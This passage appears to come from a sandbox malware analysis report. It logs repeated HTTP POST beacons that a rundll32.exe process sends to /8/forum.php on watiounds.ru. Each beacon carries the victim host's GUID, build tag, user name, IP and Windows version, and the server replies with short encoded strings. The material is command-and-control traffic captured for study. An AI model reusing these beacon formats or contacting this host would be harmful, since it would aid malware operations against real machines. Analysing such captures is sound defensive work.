                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:40.546618938 CEST370INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:40 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 42 56 45 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cBVEYARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          3192.168.2.224916895.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:17:01.770440102 CEST9OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:17:01.900310040 CEST9INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:17:01 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4a 56 45 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cJVEQARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          30192.168.2.224919595.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:21:36.905658007 CEST69OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:37.028929949 CEST69INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:37 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 59 4d 4e 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cYMNBARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          300192.168.2.224946595.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:40.872823954 CEST371OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:41.000818014 CEST371INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:40 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 42 4e 4d 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cBNMYARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          301192.168.2.224946695.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:41.316462994 CEST372OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:41.438505888 CEST372INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:41 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 59 42 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZYBAARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          302192.168.2.224946795.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:41.758727074 CEST373OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:41.887953997 CEST373INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:41 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4b 4b 50 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cKKPPARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          303192.168.2.224946895.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:42.212184906 CEST374OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:42.339983940 CEST374INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:42 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 47 4e 4d 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cGNMTARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          304192.168.2.224946995.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:42.660339117 CEST375OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:42.784445047 CEST376INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:42 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 41 46 55 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cAFUZARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          305192.168.2.224947095.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:43.114468098 CEST376OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:43.242408037 CEST377INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:43 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 56 45 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZVEAARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          306192.168.2.224947195.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:43.557630062 CEST377OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:43.683438063 CEST378INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:43 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 4b 50 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZKPAARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          307192.168.2.224947295.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:43.996218920 CEST379OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:44.119332075 CEST379INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:44 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 48 48 53 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cHHSSARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          308192.168.2.224947395.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:44.435489893 CEST380OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:44.561414003 CEST380INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:44 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 51 59 42 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cQYBJARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          309192.168.2.224947495.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:44.893280029 CEST381OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:45.017296076 CEST381INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:44 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 47 51 4a 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cGQJTARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          31192.168.2.224919695.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:21:37.357884884 CEST70OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:37.486300945 CEST70INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:37 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 59 42 59 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cYBYBARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          310192.168.2.224947595.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:45.340107918 CEST382OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:45.462308884 CEST382INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:45 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4d 4d 4e 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cMMNNARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          311192.168.2.224947695.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:45.783958912 CEST383OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:45.918180943 CEST383INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:45 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 59 4a 51 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cYJQBARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          312192.168.2.224947795.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:46.243427992 CEST384OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:46.369015932 CEST385INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:46 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 42 4a 51 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cBJQYARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          313192.168.2.224947895.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:46.685139894 CEST385OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:46.813312054 CEST386INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:46 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 46 55 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCFUXARRABw==0


